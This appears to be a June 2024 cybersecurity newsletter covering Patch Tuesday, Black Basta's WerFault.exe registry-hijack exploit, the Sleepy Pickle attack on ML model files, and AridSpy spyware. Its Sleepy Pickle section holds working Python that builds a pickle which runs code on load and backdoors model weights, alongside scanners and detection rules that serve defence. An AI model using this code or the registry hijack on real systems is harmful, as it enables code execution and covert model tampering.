Jun 14 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that's got that Friday feeling
It's Friday, folks, which can only mean one thing... It's time for our weekly segment!
It goes by many names. Patch of the Week, Tweak of the Week. Okay, that's it.
Congrats, the cybercriminals are no match... for your patch!
Microsoft Patch Tuesday: June 2024
Microsoft released security updates fixing 51 flaws: one rated Critical and 50 rated Important, plus 17 further fixes for the Edge browser. The most severe is CVE-2024-30080, a remote code execution (RCE) flaw in Microsoft Message Queuing (MSMQ) with a CVSS score of 9.8. None of the flaws is known to have been exploited in the wild yet. Also noteworthy is CVE-2023-50868, a DNSSEC validation flaw that lets an attacker exhaust CPU on a validating resolver. Adobe, AWS, Google and other vendors issued security updates in the same week.
Google doesn't Play, baby
Google Pixel June Security Update: Critical Fixes and New Features
Google's June Pixel update includes multiple critical fixes and one high-severity vulnerability that "may be under limited, targeted exploitation." Update your devices now. The critical fixes address vulnerabilities that could let a local attacker escalate privileges, potentially as one link in a longer exploit chain. Alongside the security patches, this quarterly drop adds new AI features for the Pixel 8 and 8a, despite hardware concerns. Meanwhile, the wider Android landscape remains risky: researchers report 90 malicious apps on Google Play with over 5.5 million installs between them.
Now, on to today's hottest cybersecurity news stories:
Black Basta ransomware targets Windows zero-day flaw
Sleepy Pickle is the ghost in the machine learning models
Arid Viper just dropped its AridSpy mobile espionage move
Threat actors linked to the Black Basta ransomware have exploited a privilege escalation flaw in the Microsoft Windows Error Reporting Service (CVE-2024-26169), which was patched in March 2024. This flaw, with a CVSS score of 7.8, allows attackers to gain SYSTEM privileges.
Exploiting the Flaw
Symantec's analysis found that an exploit tool used in recent attacks appears to have been compiled before the patch shipped, which would make this zero-day exploitation. The threat group, which Symantec tracks as Cardinal (aka Storm-1811 or UNC4393), deploys Black Basta ransomware, often on access obtained through earlier QakBot and DarkGate infections.
Attack Vectors
In recent attacks, Black Basta operators have abused legitimate Microsoft tools such as Quick Assist and Teams. They impersonate IT staff to gain the victim's trust, then steal credentials with EvilProxy, run batch scripts and establish persistence with SystemBC.
Technical Details
The exploit abuses the fact that the Windows file werkernel.sys uses a null security descriptor when creating registry keys, meaning the keys it creates are not protected by an ACL. The exploit creates the registry key 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WerFault.exe' and sets its 'Debugger' value to the path of its own executable, so that the next time WerFault.exe is launched, the attacker's binary runs in its place and a shell is started with administrative privileges.
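The registry write above is a good telemetry hook. As an added detection example (this is not Symantec's or Microsoft's code): Sysmon Event ID 13 (RegistryEvent, value set) records the key path in TargetObject and the new value in Details, so a rule can flag any Debugger value set under Image File Execution Options, rank a WerFault.exe hook highest because it matches this exploit, and skip known-good entries. The events below are constructed for the example, and the allowlist entry for Process Explorer's "Replace Task Manager" feature is an assumption about what your estate considers benign.

```python
"""Flag IFEO Debugger hijacks in Sysmon-style Event ID 13 records.
Example code for this newsletter, not vendor detection logic."""
import re

# TargetObject of a Sysmon "Value Set" event for an IFEO Debugger value.
IFEO_DEBUGGER = re.compile(
    r"^HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
    r"Image File Execution Options\\(?P<image>[^\\]+)\\Debugger$",
    re.IGNORECASE,
)

# Locations a low-privileged user can write to; a "debugger" living there is a
# red flag regardless of which image it hooks.
USER_WRITABLE = re.compile(r"\\(Users|Temp|ProgramData|Public)\\", re.IGNORECASE)

# Assumed benign IFEO Debugger use: Process Explorer's "Replace Task Manager".
# Pairs of (hooked image, debugger binary name), both lower-case.
ALLOWLIST = {("taskmgr.exe", "procexp64.exe"), ("taskmgr.exe", "procexp.exe")}

# Constructed sample telemetry (not real events). The first record is the
# shape the CVE-2024-26169 exploit leaves behind; the others are noise.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\bob\AppData\Local\Temp\wer.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                     r"\Image File Execution Options\WerFault.exe\Debugger",
     "Details": r"C:\Users\bob\AppData\Local\Temp\wer.exe"},
    {"EventID": 13, "Image": r"C:\Tools\procexp64.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                     r"\Image File Execution Options\taskmgr.exe\Debugger",
     "Details": r'"C:\Tools\procexp64.exe"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                     r"\Image File Execution Options\WerFault.exe\GlobalFlag",
     "Details": "DWORD (0x00000002)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": "", "Details": ""},
]


def _basename(path):
    """Lower-cased file name of a (possibly quoted) Windows path."""
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def find_ifeo_debugger_sets(events, allowlist=ALLOWLIST):
    """Return one finding per non-allowlisted IFEO Debugger value set."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = IFEO_DEBUGGER.match(ev.get("TargetObject", ""))
        if not m:
            continue
        image = m.group("image").lower()
        debugger = ev.get("Details", "")
        if (image, _basename(debugger)) in allowlist:
            continue
        reasons = []
        if image == "werfault.exe":
            reasons.append("WerFault.exe debugger hijack: matches the "
                           "CVE-2024-26169 exploit pattern")
        if USER_WRITABLE.search(debugger):
            reasons.append("debugger path is user-writable")
        if not reasons:
            reasons.append("unexpected IFEO Debugger value")
        findings.append({"image": image, "debugger": debugger,
                         "writer": ev.get("Image", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_ifeo_debugger_sets(SAMPLE_EVENTS):
        print(f["image"], "<-", f["debugger"], "by", f["writer"])
        for r in f["reasons"]:
            print("   ", r)
```

On a live host the same rule applies to the audit log (Object Access auditing on the IFEO key) or to a periodic enumeration of the IFEO subkeys; the point is that a Debugger value under IFEO is rare enough to alert on by default and allowlist by exception.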
Compilation and Use
The malicious tool carried a compilation timestamp of February 27, 2024, weeks before the patch, and a second sample was dated December 18, 2023. Attackers do commonly alter timestamps to hinder analysis, but Symantec notes there would have been little reason to do so in this case, which supports the zero-day reading.
Mitigation
Microsoft's March 2024 update fixes this flaw; apply the latest updates. Microsoft's security software also includes detections for the malware used in these attacks.
Ransomware Trends
Ransomware attacks are on the rise, with a new family called DORRA (a Makop variant) emerging. Google-owned Mandiant reports a 75% increase in ransomware-related posts on data leak sites, and over $1.1 billion paid to attackers in 2023, up from $567 million in 2022.
"The resurgence in extortion activity is driven by the resettling of the cybercriminal ecosystem, new entrants, partnerships, and new ransomware service offerings," Mandiant noted.
Stay updated and secure!
A new attack technique named "Sleepy Pickle" highlights the risks of the Pickle format used in machine learning (ML). Described by Trail of Bits, the technique corrupts ML models themselves and so poses a severe supply chain risk.
What is Sleepy Pickle?
Sleepy Pickle is a novel attack that targets the ML model rather than the underlying system. It weaponises the Pickle format, which ML libraries such as PyTorch use to serialise models and which executes arbitrary code during deserialisation.
How It Works
Attackers insert a payload into a Pickle file using a tool such as Fickling and deliver it via an adversary-in-the-middle (AitM) attack, phishing, a supply chain compromise, or a weakness in the victim's systems. When the file is deserialised on the victim's machine, the payload executes and modifies the ML model in place.
Impact on ML Models
The payload can backdoor the model, control its outputs, or tamper with the data it processes. That can mean harmful outputs, data theft, or manipulated summaries that point users to phishing pages. Because the compromise happens when the Pickle file is loaded in Python, Sleepy Pickle can maintain undetected access to the model.
Mitigation Strategies
Hugging Face recommends:
Loading models only from trusted users and organisations.
Using signed commits.
Loading models from TensorFlow or JAX formats with the from_tf=True auto-conversion mechanism.
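To make the load-time behaviour concrete, here is an added example (not Trail of Bits' or Hugging Face's code) that hand-assembles a Pickle stream of the kind a Fickling-style injection produces: an opcode sequence that runs attacker code through builtins.exec during deserialisation and then returns a model whose weights have been rewritten, so the caller still gets a model that loads. Next to it are two checks a loader can apply before trusting a file: a static scan of the globals the stream would import, and an Unpickler subclass that only resolves allowlisted names. The "model" is a constructed dict of weights, not a real framework checkpoint; a PyTorch checkpoint would need torch's classes on the allowlist.

```python
"""Sleepy-Pickle-style load-time tampering, plus two defences.
Example code for this newsletter; the model is a constructed stand-in."""
import io
import pickle
import pickletools

# Constructed stand-in for a checkpoint (hypothetical weights).
CLEAN_MODEL = {"layer1": [0.1, 0.2, 0.3], "bias": [0.0]}

# Attacker code that runs inside the victim process while the file loads.
# It parks a hook under builtins so a later GLOBAL opcode can reach it by
# name; the hook rewrites the model in place and returns it.
PAYLOAD = (
    "import builtins\n"
    "def _patch(m):\n"
    "    m['bias'] = [99.0]   # backdoored weights\n"
    "    return m\n"
    "builtins._patch = _patch\n"
)


def _global(module, name):
    """GLOBAL opcode: push module.name onto the unpickler stack."""
    return b"c" + module.encode() + b"\n" + name.encode() + b"\n"


def build_sleepy_pickle(model):
    """Assemble: exec(PAYLOAD) (result popped), then builtins._patch(model),
    which becomes the object pickle.load() hands back."""
    code = PAYLOAD.encode("utf-8")
    body = pickle.dumps(model, protocol=2)[2:-1]  # drop PROTO header and STOP
    return (
        b"\x80\x02"                                          # PROTO 2
        + _global("builtins", "exec")
        + b"X" + len(code).to_bytes(4, "little") + code      # BINUNICODE
        + b"\x85" + b"R" + b"0"                              # TUPLE1 REDUCE POP
        + _global("builtins", "_patch")
        + body                                               # legitimate model
        + b"\x85" + b"R"                                     # TUPLE1 REDUCE
        + b"."                                               # STOP
    )


def clean_pickle(model):
    """What an honest checkpoint of the same model looks like."""
    return pickle.dumps(model)


def unsafe_load(data):
    """What most loaders do: plain pickle.loads; the payload runs here."""
    return pickle.loads(data)


def referenced_globals(data):
    """Static scan: every module.name the stream would import, without
    executing it. Handles GLOBAL/INST (inline names) and STACK_GLOBAL
    (names taken from the two most recently pushed strings)."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8",
                         "UNICODE", "STRING", "BINSTRING", "SHORT_BINSTRING"):
            strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Only allowlisted globals may be resolved; everything else is refused.
    Extend ALLOWED with the classes your framework's checkpoints need."""
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_is_refused(data):
    """True when the allowlisting unpickler rejects the stream."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    data = build_sleepy_pickle(CLEAN_MODEL)
    print("globals in stream:", referenced_globals(data))
    print("plain pickle.loads returns:", unsafe_load(data))
    print("restricted unpickler refused it:", load_is_refused(data))
```

Two things worth noticing: the static scan catches this file because it must name builtins.exec to run anything, and it names it in plain text, so a pre-load scan of referenced globals is cheap and effective; and the allowlisting unpickler fails closed, so it also stops payloads that reach code through less obvious importable callables than exec. Neither replaces the Hugging Face advice above about provenance and signed commits, since a trusted source that has itself been compromised will still serve a file that scans as expected for that framework's classes.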
Broader Attack Surface
Sleepy Pickle can also corrupt other local models that are loaded alongside the malicious file, widening the attack surface. Control over any Pickle file in the supply chain can be enough to attack an organisation's models, so lower-level supply chain weaknesses turn into model-level compromises.
Call to Action
Organisations must be vigilant about where their ML models come from and the integrity of the files they load. Robust security practices and staying current with patches help mitigate such model-level attacks.
Stay secure and informed!
Stay ahead of the curve with Presspool.ai! Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." That's us, alright! How about you? Visionary AI executive, much?
And if the newsletter gets your motor running, then you can take a butchers at their cool AI marketing product too, which is sure to help you make the most of our new artificial overlords and put them to work for your business.
Rest assured, the process is very straightforward.
You simply:
Sign up and create a campaign.
Define your audience, budget, and message to captivate your audience.
Launch your campaign, as Presspool's AI matches it with ideal newsletter audiences for optimal reach and conversions.
Finally, leverage real-time analytics to track performance and refine future strategies. Elevate your marketing game and stay informed with Presspool.ai! Simples!
Presspool.ai may just have what you need to succeed. And if the product isn't for you, the newsletter alone is a gamechanger. And we know newsletters.
The threat actor known as Arid Viper is behind a mobile espionage campaign using trojanized Android apps to deliver spyware called AridSpy. This malware is distributed through fake websites impersonating messaging apps, a job app, and a Palestinian Civil Registry app.
Background
ESET reports that AridSpy's malicious code is added to legitimate apps to create trojanised versions, which are then distributed through dedicated websites. The activity spans five campaigns since 2022, three of which are still active. Arid Viper, also known as APT-C-23 and Desert Falcon, has targeted military personnel, journalists, and dissidents in the Middle East since 2017.
Technical Details
AridSpy has evolved into a multi-stage trojan capable of downloading additional payloads from a command-and-control (C2) server. It targets users in Palestine and Egypt through fake apps such as LapizaChat and a fraudulent Palestinian Civil Registry app.
Websites and Apps
Palestinian Civil Registry: Hosted on palcivilreg[.]com and advertised via a Facebook page. The app mimics a legitimate app and uses the legitimate app's real server to retrieve information.
Job Opportunity App: Found on almoshell[.]website, a domain registered in August 2023. Unlike the other apps, it is not based on any legitimate application.
Infection Chain
Initial Infection: The user downloads the trojanised app from a bogus site.
Payload Deployment: The app checks for security software and downloads a first-stage payload if none is found.
Persistent Threat: The first-stage payload downloads further components and remains active even if the initial app is uninstalled.
Spyware Capabilities
Data Harvesting: Gathers data from the device, deactivates itself, or exfiltrates data in response to C2 commands or specific triggers.
Surveillance: Takes pictures with the front camera when the phone is locked or unlocked, no more than once every 40 minutes and only when the battery is above 15%.
Stay Vigilant
AridSpy's stealthy and persistent nature underscores the importance of downloading apps only from trusted sources. Be cautious of unfamiliar websites and apps, and make sure your device has robust security measures in place.
Stay informed and secure!
Extra, Extra! Read all about it!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday.
Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders.
Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future.
Let us know what you think.
So long and thanks for reading all the phish!